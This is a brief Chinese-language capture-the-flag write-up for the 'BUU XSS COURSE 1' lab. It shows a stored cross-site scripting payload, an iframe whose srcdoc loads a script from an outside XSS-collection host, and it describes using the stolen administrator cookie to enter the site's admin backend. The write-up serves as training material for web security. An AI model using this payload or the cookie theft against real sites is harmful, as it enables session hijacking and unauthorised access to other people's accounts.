BUU XSS COURSE 1"/>
BUU XSS COURSE 1
根据题目可知,这是一道xss题
打开如图所示
我们在吐槽框中输入1可以发现可以显示出来;
输入一个简单的xss代码
<script>alert(1)</script>
我们发现回显不出来
由此可知,这是存储型xss。
因为靶机没法访问外网,我们可以利用内网xss平台,
例如.php?do=login
先创建一个项目,然后把内容选上,然后把payload写进吐槽框,然后上传;
payload:
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://i0.al/O9UPI3"></sCrIpT>>
在xss平台我们可以看到有一个admin的访问记录,利用管理员的cookie,以及来访地址,去访问url
http://xxxxxxxxxxxxxxxxxxxxxxxxxx/backend/admin.php
根据提示
我们换取admin的cookie
flag就出来了
更多推荐
BUU XSS COURSE 1
发布评论